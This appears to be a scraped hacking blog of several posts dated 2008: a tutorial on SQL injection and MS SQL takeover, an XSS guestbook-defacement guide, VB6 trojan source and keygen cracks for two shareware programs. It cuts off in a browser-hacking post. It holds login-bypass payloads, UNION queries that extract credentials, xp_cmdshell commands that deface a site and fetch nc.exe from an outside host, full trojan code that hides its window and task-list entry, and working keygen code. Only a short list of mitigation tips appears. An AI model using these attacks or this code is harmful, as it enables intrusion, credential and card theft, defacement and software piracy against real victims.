Databases have been the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get the credit card information. And just one hack on a commercial site will bring down its reputation and also the customers as they also want their credit card info secured. Most of the commercial websites use Microsoft sql (MSsql) and Oracle database servers. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itself to be “unbreakable” But hackers took it as a challenge and showed lots of bugs in it also !! I was addicted to hacking of database servers from a few months. So I just decided to share the knowledge with others. Well the things discussed here are not discovered by me ok. Yeah I experimented with them a lot.

user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again.

"Select * from table1 where login='"&log& "' and password='" &pwd& "' "

Now if a user types his login name as "Chintan" and password as "h4x3r" then these values will pass to the asp page with post method and then the above query will become

"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "

Thats fine. There will be an entry Chintan and h4x3r in login and password fields in the database so we will receive a message as login successful. Now what if I type loginname as "Chintan" and password as
hi' or 'a'='a in the password text box ? The query will become as follows:

"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "

And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !!
The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "Chintan" !! You can try the following in the password text box if the above doesn't work for some websites:

hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide

Chintan ' --
Chintan " --

or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "Chintan" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!!

IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the sql injection vulnerablity. Just go to www33.brinkster.com/chintantrivedi/login.htm

More advance hacking of Databases using ODBC error messages!!!
--------------------------------------------------------------

Above we saw as to how login successfully without knowing password. Now over here I will show you how to read the whole database just by using queries in the URL !! And this works only for IIS i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a victim just after searching a few websites. You might have seen something like

http://www.nosecurity.com/mypage.asp?id=45

in the URLs. '?' over there shows that after it, 45 value is passed to a hidden datatype id. Well if you don't understand then as we have seen in the above example in the login.htm, having two input text types with names 'login_name' and 'pass' and there values were passed to logincheck.asp page. The same thing can be done by directly opening the logincheck.asp page using
http://www.nosecurity.com/logincheck.asp?login_name=Chintan&pass=h4x3r
in the URL if method="get" is used instead of method="post".

Note : or Difference between get and post method is that post method doesn't show up values passed to next paged in the url while get method shows up the values. To get more understanding of how they internally work read HTTP protocol RFC 1945 and RFC 2616.

What i mean to say is that after '?' the variables which are going to be used in that page are assigned the values. As above login_name is given value Chintan. And different variables are separated by operator '&'.

OK so coming back, id will mostly be hidden type and according to the links you click its value will change. This value of id is then passed in the query in mypage.asp page and according tothe results you get the desired page at your screen. Now if just change the value of id as 46 then you will get different page.
Now lets start our hacking the database. Lets use the magic of queries. Just type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAME which contains names of all the tables. See the query again
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarchar) and we are uniting it with 45(integer) by UNION. So we will get an error message as

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line

From the error its clear that first table is 'logintable'. It seems that this table might contain login names and passwords :-) So lets move in it. Type the following in the URL

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--

output
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5

The above error message shows that the first field or column in logintable is login_id. To get the next column name will type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5

So we get one more field name as 'login_name'. To get the third field name we will write

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

Thats it. We ultimately get the 'passwd' field. Now lets get the login names and
passwords from this table "logintable". Type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5

Thats the login name "Rahul" and to get the password of Rahul the query would be

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable
where login_name='Rahul'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of
www.nosecurity.com And's it was possible to the request of user was not checked properly. SQL
vulnerabilities still exist on many websites. The best solution is to parse the user requests and
filter out some characters as ',",--,:,etc.

Part II - using port 1434 (SQL Port)
-------------------------------------

Well uptill now we had seen how to break the database using the malformed URLs But that was done using just port 80 (http port) But this time we would use the port 1434 for hacking. Before that we will see what actually database servers are and how do they work and then how to exploit them !

The designers of MS sql gave some default stored procedures along with the product to make things flexible to the webdesigners. The procedure is nothing but functions which can used to perform some actions on the arguments passed to them. This procedures are very important to hackers. Some of the important ones are

sp_passsword -> Changes password for a specific login name.
e.g. EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’

sp_tables -> Shows all the tables in the current database.
e.g. EXEC sp_tables

xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp)

xp_msver -> Shows the MS SQL server version including the all info about the OS.
e.g. master..xp_msver

xp_regdeletekey -> Deletes a registry key.

xp_regdeletevalue ->Delets a registry value

xp_regread -> Reads a registry value

xp_regwrite -> Writes a registry key.

xp_terminate_process -> Stops a process

Well these are some important procedures. Actually there are more than 50 such types of procedures. If you want your MS SQL server to be protected then I would recommend to delete all of these procedures. The trick is open the Master database using MS SQL Server Enterprise Manager. Now expand the Extended Stored Procedures folder and delete the stored procedure by right click and delete.

Note: “Master” is an important database of the SQL server which contains all system information like login names and system stored procedures. So if a hacker deletes this master database then the SQL server will be down for ever. Syslogins is the default system table which contains the usernames and passwords of logins in the database.

Most dangerous threat : The Microsoft SQL server has default username “sa” with password blank “”. And this has ruined lots of MS sql servers in the past. Even a virus regarding this vulnerability had been released.

Thatz enough. Lets hack now. First we need to find out a vulnerable server. Download a good port scanner (many out there on web ) and scan for ip addresses having port 1433/1434 (tcp or udp) open. This is the MS Sql port which runs the sql service. Oracle’s port no. is 1521. Lets suppose we got a vulnerable server with ip 198.188.178.1 (its just an example so don’t even try it) Now there are many ways to use the SQL service. Like telnet or netcat to port no. 1433/1434. You can also use a tool known as osql.exe which ships with any SQL server 2000. Okz. Now go to dos prompt and type.

C:>osql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]

Well, this displays the help of the osql tool. Its clear from the help what we have to do now. Type

C:\> osql.exe –S 198.188.178.1 –U sa –P “”
1>
Thats what we get if we login successfully else we will get an error message as login failed for user “sa”

Now if we want to execute any command on the remote machine then just use the “xp_cmdshell” default stored procedure.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”

I would prefer to use –Q option instead of –q because it exits after executing the query. In the same manner we can execute any command on the remote machine. We can even upload or download any files on/from the remote machine. A smart attacker will install a backdoor on the machine to gain access to in future also. Now as I had explained earlier we can use the “information_schema.tables” to get the list of tables and contents of it.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”

And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”

And

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”

Output:

Username creditcard expdate
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000

Write something in index.html file ?

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’”

Wanna upload any file on the remote system.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’”

And to download any file we can use the PUT request instead of GET Its just because this commands are being executed on the remote machine and not on ours. So if you give the GET request the command will be executed on the remote machine and it will try to get the nc.exe file from our machine to the remote machine.

Thatz not over. Toolz for hacking the login passwords of Sql servers are easily available on the web. Even many buffer overflows are being discovered which can allow user to gain the complete control of the sytem with administrator privileges. The article is just giving some general issues about database servers.

Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.

Precautionay measures
---------------------------

<*> Change the default password for sa.
<*> Delete all the default stored procedures.
<*> Filter out all the characters like ',",--,:,etc.
<*> Keep upto date with patches
<*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls.

Remember security is not an add-on feature. It depends upon the smartness of administrator. The war between the hacker and administrator will go on and on and on…. The person who is aware with the latest news or bug reports will win the war. Database admins should keep in touch with some sites like

Basic Guest Book Hacking

2008-01-23T21:41:00.000-08:00

Basic Guest Book Hacking

So you have found a guest book which allows for HTML injection, so what now, what can you do?

You can do alot of interesting stuff with HTML injection (Which is actually called XSS).

Like what...
So we know that we can enter HTML into the page, chances are if the owner hasn't stopped you putting HTML into the page, chances are they wont have stopped you putting PHP into the page (this will only work if the website is hosted on a host which has PHP installed for the users, most hosts allow for PHP pages i believe).

But what if you can't inject PHP into the guest book
Ok so you can't inject PHP directly into the guest book, unlucky.
But its not the end of the world, lets think through HTML and think what we might be able to use here, what allows us to put things into a webpage without having the processing done on that website...
IFRAME, FRAME, EMBED, APPLET

FRAME, IFRAME
Lets think you want to get a php page on to a website which only accepts HTML, so lets give it some HTML.

Now what does this do?
What it does is it creates an area on the page (this can be defined by using the height and width parameters) which basically shows what is on the page that you have used (in this case http://www.hackersite.org/evilscript.php).
Please note, that all processing of information is done where this is hosted.

EMBED, APPLET
Now for all you clever clogs who can write stuff in things like java, flash etc. you could write something in that language which could get information for you or some other task (im not going to go into alot of detail due to not knowing java, flash or what you are able to do with these)
Please note, that all processing of information is done where this is hosted.

Ok we can put things onto the website, but you can't really do much to the website can you, you can't deface it or get passwords.
Well we can but this involves another element of HTML, STYLE.
What this does is it defines how something comes up on a page so you can write a style to make anything in the bold tages() to be font arial font-color blue, or something like that

Wow we can make the thing look nice but that doesn't help us get passwords or deface the website.
I'll start with defacing the website.
There is a couple of things that style can do which are very useful...

Z-INDEX, what this does is define what layer of the page your information is.
The default level is 0, this is the original webpage.
1 is above 0 therefore if you set something to be z-index = 1 then it will be above the information on level 0. which is the original webpage.
-1 is below 0 therefore is you set something to be z-index = -1 then it will be below the informatin on level 0, this will mean that what you put would be hidden behind the original website.

POSITION, what this does is define where on the page what you have used position on will be displayed, for this I will only go into absolute position but there is also relative position.
With this you define exactly where you want something to be placed. There are two parameters to absolute position, top and left. This is how far from the top of the browser area you want something and how far from the left of the browser area you want something.

HIEGHT and WIDTH, what this does is define what size something is.

Now lets combine all those together, what would happen if you set...
z-index to 1
position top = 0
postition left = 0
height = 100%
width = 100%
on an something

Well it would cover the entire page.
That would be very useful for defacing the website.
Here is some example code of what something like this would look like.

You have been Hacked...
By Satal Keto

But what about getting passwords
Well if you can cover their web page with your own, maybe you can take their source code put that into what has been given above, change the form which allows them to login, to send you the information instead, obviously this is very obvious, so you will have to think of ways of changing this method to make sure you dont make it obvious of what has just happened.

Practicing HTML Injection/XSS
If anyone is interested in practicing what i have been talking about here, on my website i have created an area (completely secure) which will allow you to try this on differen't levels of filtering.
Each user has their own area (which only that user can access) so there is no worries about using that and then finding someone has stolen your information.
The website is Learn2Hack.Net
You need to be a member of Learn2Hack in order to access the practice area.
You will need to go to "Practice Area's" then to "XSS" then you choose either Guest book 1 (which has a small amount of filtering) or Guest book 2 (which has more filtering).

More Information
More information on the topic of XSS can be found in the following places...
CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
CGISecurity.com Cross Site Scripting questions and answers
Paper: HTML Code Injection

How to write a simple trojan in vb6

2008-01-23T21:37:00.000-08:00
How to write a simple trojan in vb6

Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code.
The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go
through what you need for both and some sample code.

Server

The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it.
To do this you start by using

Private Sub Form_Load()
Me.Visible = False
End Sub

This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier.
So to get our application hidden from that a little better we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub

(Due to Bill gates, all running exe's will be displayed in the list of running processes. Your app will be hidden in the Running Applications List though )

So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this
tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control.
I named my control win but you can name yours what ever.
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat.

Then we add this code to our main form:

Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. (Public so it can be used by code outside of the Module) So add this code to the module and we are about done with the server
of the Trojan!

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

Ok now we have a program that when the data “Msgbox” is sent to it on port 2999 it will display a msgbox on the victims computer. When the data "shutdown" is sent to it on port 2999 it will shutdown the computer. I used a Select Case statement so it is easy to modify this code to your own needs later on.

Congradulations! You just made your first Trojan. Lets go over the complete code now.

Main Form

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

Remember to add your winsock control and name it to win if you use this code.

Module

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server
that accepts the command of “shutdown” and "msgbox" lets make a client that sends the command “shutdown” and "msgbox".

Make a form and add a Winsock Control, a text box, and 4 buttons. The Text box should be named txtIP if you want it to work with this code.
In addition, your buttons should be named cmdConnect, cmdMsgbox, cmdShutdown, and cmdDisconnect. Now lets look at the code we would use to make our
Client.

Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub

Private Sub cmdMsgbox_Click()
Win.SendData "msgbox"
End Sub

Private Sub cmdShutdown_Click()
Win.SendData "shutdown"
End Sub

That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send
the “shutdown” or "msgbox" data to the server and the respective actions will be carried out (shutdown computer or display a msgbox)

These two programs do very little but can quickly evolve into a powerful remote administration tool if you know what you are doing. I suggest trying
to add different types of error handeling and functions to both the server and client.

Ideas:

Make the server able to download a file specified by the attacker

Add code to make the Server be executed at startup. (Its a registry key)

Add a keylogger to the server - make it send the log to the attacker. There are loads more things you could do, just use your imagination

How to Make Key Generators

2008-01-23T21:34:00.000-08:00
How to Make Key Generators

In this tutorial I will show how to make a key-gen for Ize and Swiftsearch. The protection that these programs use is the well known Enter-Name-and-Registration-Number method. After selecting 'register', a window pops up where you can enter your name and your registration number. The strategy here is to find out where in memory the data you enter is stored and then to find out what is done with it.

Part 1: Scanline Swiftsearch 2.0!

Swiftsearch is a useful little program that you can use to search on the web. I will explain step by step how to crack it.

step 1. Start the program :)

step 2: Choose register from the menus. You will now get a window where you can enter your name and your registration number.

step 3: Enter SoftIce (ctrl-d)

step 4: We will now set a breakpoint on functions like GetWindowText(a) and GetDlgItemText(a) to find out where in memory the data that we just entered is stored. The function that is used by this program is GetDlgItemTexta (trial and error, just try yourself :) so, in SoftIce type BPX GetDlgItemTexta and exit SoftIce with the g command.

step 5: Now type a name and a registration number (I used razzia and 12345) and press OK, this will put you back in SoftIce. Since you are now inside the GetDlgItemTexta function press F11 to get out of it. You should see the following code:

lea eax, [ebp-2C] :<--- we are looking for this location
push eax
push 00000404
push [ebp+08]
call [USER32!GetDlgItemTextA]
mov edi, eax :<--- eax has the length of the string
and is stored in edi for later usage.

We see that EAX is loaded with a memory address and then pushed to the stack as a parameter for the function GetDlgItemTextA. Since the function GetDlgItemTextA is already been run we can look at EBP-2c (with ED EDP-2c) and see that the name we entered is there. Now we know where the name is stored in memory, normally it would be wise to write that address down, but we will see that in this case it wont be necessary.
So, what next? Now we have to allow the program to read the registration number we entered. Just type g and return and when back in SoftIce press F11. You should see the following code:

push 0000000B
lea ecx, [ebp-18] : <--So, ebp-18 is where the reg. number
push ecx : is stored.
push 0000042A
push [ebp+08]
call [USER32!GetDlgItemTextA]
mov ebx, eax : <--save the lenght of string in EBX
test edi, edi : <--remember EDI had the lenght of the
jne 00402FBF : name we entered?
We see that the registration number is stored at location EBP-18 , check it with ED EBP-18. Again, normally it would be wise to note that address down. Also we see that it is checked if the length of the name we gave was not zero. If it is not zero the program will continue.

Step 6: Ok, now we know where the data we entered is stored in memory. What next?
Now we have to find out what is DONE with it. Usually it would we wise to put breakpoints on those memory locations and find out where in the program they are read. But in this case the answer is just a few F10's away. Press F10 until you see the following code :

cmp ebx, 0000000A :<--remember EPX had the length of the
je 00402FDE : registration code we entered?
These two lines are important. They check if the length of the registration code we entered is equal to 10. If not the registration number will be considered wrong already. The program wont even bother to check it. Modify EBX or the FLAG register in the register window to allow the jump. Continue Pressing F10 until you get to the following code (note that the adresses you will see could be different) :

:00402FDE xor esi, esi :<-- Clear ESI
:00402FE0 xor eax, eax :<-- Clear EAX
:00402FE2 test edi, edi
:00402FE4 jle 00402FF2
:00402FE6 movsx byte ptr ecx, [ebp + eax - 2C] :<-- ECX is loaded with a letter of the name we entered.
:00402FEB add esi, ecx :<-- Add the letter to ESI
:00402FED inc eax :<-- Increment EAX to get next letter
:00402FEE cmp eax, edi :<-- Did we reach the end of the string?
:00402FF0 jl 00402FE6 :<-- If not, go get the next letter.

Well, we see that the program adds together all the letters of the name we entered. Knowing that ESI contains the sum of the letters, lets continue and find out what the program does with that value :

:00402FF2 push 0000000A
:00402FF4 lea eax, [ebp-18] :<-- Load EAX with the address of the reg. number we entered
:00402FF7 push 00000000
:00402FF9 push eax :<-- Push EAX (as a parameter for the following function)
:00402FFA call 00403870 :<-- Well, what do you think this function does? :)
:00402FFF add esp, 0000000C
:00403002 cmp eax, esi :<-- Hey!
:00403004 je 00403020

We see that a function is called and when RETurned ESI is compared with EAX. Hmm, lets look at what's in EAX. A '? EAX' reveals :
00003039 0000012345 "09"

Bingo. That's what we entered as the registration number. It should have been what's inside ESI. And we know what's inside ESI, the sum of the letters of the name we entered!
Step 7: Now we know how the program computes the registration code we can make a key-gen.
But we should not forget that the program checks also that the registration number has 10
digits.
A simple C code that will compute the registration number for this program could look like this:

##################################################################
#include
#include
main()
{
char Name[100];
int NameLength,Offset;
long int Reg = 0, Dummy2 = 10;
int Dummy = 0;
int LengtDummy = 1;
int Lengt , Teller;
printf("Scanline SwiftSearch 2.0 crack by neo.\n");
printf("Enter your name: ");
gets(Name);
NameLength=strlen(Name);

/* the for lus calculates the sum of the letters in Name */
/* and places that value in Reg */
for (Offset=0;Offset{
Reg=Reg+Name[Offset];
}
/* the while lus calculates the lenght of the figure in */
/* Reg and places it in Lengt */
while (Dummy != 1)
{
if ( Reg < Dummy2 )
{ Lengt = LengtDummy ; Dummy =1;
}
else
{ LengtDummy=LengtDummy + 1; Dummy2=Dummy2*10;
}
};
printf("\nYour registration number is : " );
/* First print 10-Lengt times a 0 */
Lengt=10-Lengt;
for (Teller=1;Teller<=Lengt;Teller=Teller+1) printf("0");
/* Then print the registration number */
printf("%lu\n",Reg);
}

Case 2 Ize 2.04 from Gadgetware
Ize from Gadgetware is a cute little program that will put a pair of eyes on your screen which will
follow your mousepointer. It has a register function where you can enter your name and a registration
number. The strategy in this case is still the same : Find out where in memory the entered information
is stored and then find out what is done with that information.

Step 1: Start Ize. Chose register and enter a name and a number. I used 'razzia' and '12345'.

Sterp 2: Enter (CTRL-D) Softice and set a breakpoint on GetDlgItemTextA.

Step 3: Leave SoftIce and press OK. This will put you back in Softice. You will be inside the GetDlgItemTextA
function. To get out of it press F11. You should see the following code :

mov esi, [esp + 0C]
push 00000064
push 0040C3A0 :<--On this memory location the NAME we entered will be stored.
mov edi, [USER32!GetDlgItemTextA] :<--Load edi with adress of GetDlgItemTextA
push 00004EE9
push esi
call edi :<-- Call GetDlgItemTextA
push 00000064 :<-- (you should be here now)
push 0040C210 :<--On this memory location the NUMBER we entered will be stored
push 00004EEA
push esi
call edi :<-- Call GetDlgItemTextA

We see that the function GetDlgItemTextA is called twice in this code fragment. The first call has
already happened. With ED 40C3A0 we can check that the name we entered is stored on that location.
To allow the program to read in the number we entered we type G and enter. Now we are inside the Get-
DlgItemTextA function again and we press f11 to get out of it. We check memory location 40C210 and
we see the number we entered is stored there.
Now we know the locations were the name and the number are stored,we note those down!

Step 4: Ok, what next? We now know where in memory the name and the number are stored. We need to find out
what the program does with those values. In order to do that we could set breakpoints on those memory
locations to see where they are read. But in this case it wont be necessary. The answer is right after the
above code :

push 0040C210 :<--save the location of the number we entered (as a parameter for the next call)
call 00404490 :<-- call this unknown function
add esp, 00000004
mov edi, eax :<-- save EAX (hmmmm)

We see a function being called with the number-location as a parameter. We could trace into the function and see what it does, but that is not needed. With your experience of the Swiftsearch
example you should be able to guess what this function does. It calculates the numerical value of the registration number and puts it in EAX. To be sure we step further using F10 untill we are past the call and check the contents of EAX (with ? EAX). In my case it showed : 00003039 0000012345 "09".

Knowing that EDI contains our registration number we proceed:
push 0040C3A0 :<-- save the location of the name we entered (as a parameter for the next call)
push 00409080 :<-- save an unknown memory-location (as a parameter for the next call)
call 004043B0 :<--call to an unknown function
add esp, 00000008
cmp edi, eax :<--compare EDI (reg # we entered) with EAX (unknown, since the previous call changed it)
jne 004018A1 :<--jump if not equal
We see that a function is called with two parameters. One of the parameters is the location of the name
we entered. The other we dont know, but we can find out with ED 409080. We see the text 'Ize'.
This function calculates the right registration number using those two parameters. If you just want to
crack this program, you can place a breakpoint right after the call and check the contents of EAX. It will
contain the right registration number. But since we want to know HOW the reg. # is calculated we will trace inside the function (using T). We will then try to find out HOW the contents of EAX got in there.

Step 5: Once inside the interesting function you will see that we are dealing with a rather long function. It wont be necessary for me to include the complete listing of this function, because we wont need all of it to make our key-gen.
But in order find out which part of the code is essential for the computation of the right registration number, you have to trace STEP by STEP and figure out what EXACTLY is going on!

Afther doing this i found out that the first part of the function computes some kind of "key". Then this
"key" is stored in memory and in that way passed on to the second part of the function.
The second part of the function then computes the right registration number, based on this "key" AND
the name we entered.
The code that is essential and that we need for our key-gen is the following:
( Note that before the following code starts, the registers that are used will have the following values:
EBX will point to the first letter of the name we entered,
EDX will be zero,
EBP will be zero,
The "key" that we talked about earlier is stored in memory location 0040B828 and will
have 0xA4CC as its initial value. )

:00404425 movsx byte ptr edi, [ebx + edx] :<-- Put first letter of the name in EDI
:00404429 lea esi, [edx+01] :<-- ESI gets the "letter-number"
:0040442C call 00404470 :<-- Call function
:00404431 imul edi, eax :<-- EDI=EDI*EAX (eax is the return value of the the previous call)
:00404434 call 00404470 :<-- Call function
:00404439 mov edx, esi
:0040443B mov ecx, FFFFFFFF
:00404440 imul edi, eax :<-- EDI=EDI*EAX (eax is the return value of the previous call)
:00404443 imul edi, esi :<-- EDI=EDI*ESI ( esi is the number of the letter position)
:00404446 add ebp, edi :<-- EBP=EBP+EDI (beware that EBP will finally contain the right reg#)
:00404448 mov edi, ebx :<--these lines compute the lenght of the name we entered
:0040444A sub eax, eax :<--these lines compute the lenght of the name we entered
:0040444C repnz :<--these lines compute the lenght of the name we entered
:0040444D scasb :<--these lines compute the lenght of the name we entered
:0040444E not ecx :<--these lines compute the lenght of the name we entered
:00404450 dec ecx :<-- ECX now contains the lenght of the name
:00404451 cmp ecx, esi
:00404453 ja 00404425 :<-- If its not the end of the name , go do the same with the next letter
:00404455 mov eax, ebp :<-- SAVE EBP TO EAX !!!!
:00404457 pop ebp
:00404458 pop edi
:00404459 pop esi
:0040445A pop ebx
:0040445B ret
_____
:00404470 mov eax, [0040B828] :<-- Put "key" in EAX
:00404475 mul eax, eax, 015A4E35 :<-- EAX=EAX * 15A4E35
:0040447B inc eax :<-- EAX=EAX + 1
:0040447C mov [0040B828], eax :<-- Replace the "key" with the new value of EAX
:00404481 and eax, 7FFF0000 :<-- EAX=EAX && 7FFF0000
:00404486 shr eax, 10 :<-- EAX=EAX >>10
:00404489 ret

The above code consists of a loop that goes trough all the letters of the name we entered. With each
letter some value is calculated, all these values are added up together (in EBP). Then this value is stored
in EAX and the function RETurns. And that was what we were looking for, we wanted to know how EAX got its value!

Step 6: Now to make a key-gen we have to translate the above method of calculating the right reg# into a
c program. It could be done in the following way :
(Note : I am a bad c programmer :)

#include
#include
main()
{
char Name[100];
int NameLength,Offset;
unsigned long Letter,DummyA;
unsigned long Key = 0xa4cc;
unsigned long Number = 0;
printf("Ize 2.04 crack by neo\n");
printf("Enter your name: ");
gets(Name);
NameLength=strlen(Name);
for (Offset=0;Offset{
Letter=Name[Offset];
DummyA=Key;
DummyA=DummyA*0x15a4e35;
DummyA=DummyA+1;
Key=DummyA;
DummyA=DummyA & 0x7fff0000;
DummyA=DummyA >> 0x10;
Letter=Letter*DummyA;
DummyA=Key;
DummyA=DummyA*0x15a4e35;
DummyA=DummyA+1;
Key=DummyA;
DummyA=DummyA & 0x7fff0000;
DummyA=DummyA >> 0x10;
Letter=Letter*DummyA;
Letter=Letter*(Offset+1);
Number=Number+Letter;
}
printf("\nYour registration number is : %lu\n",Number);
}
####################################################

Hacking from your Web Browser

2008-01-23T21:26:00.000-08:00
Hacking from your Web Browser
00000Hacking from your Web Browser00000

************************************************** **********************

I - Introduction

This file will describe several techiniques to aquire a password file just by using an ordinary web browser. The information provided will be best described for the beginner hacker, but all hackers should benifit from this information. We will only cov

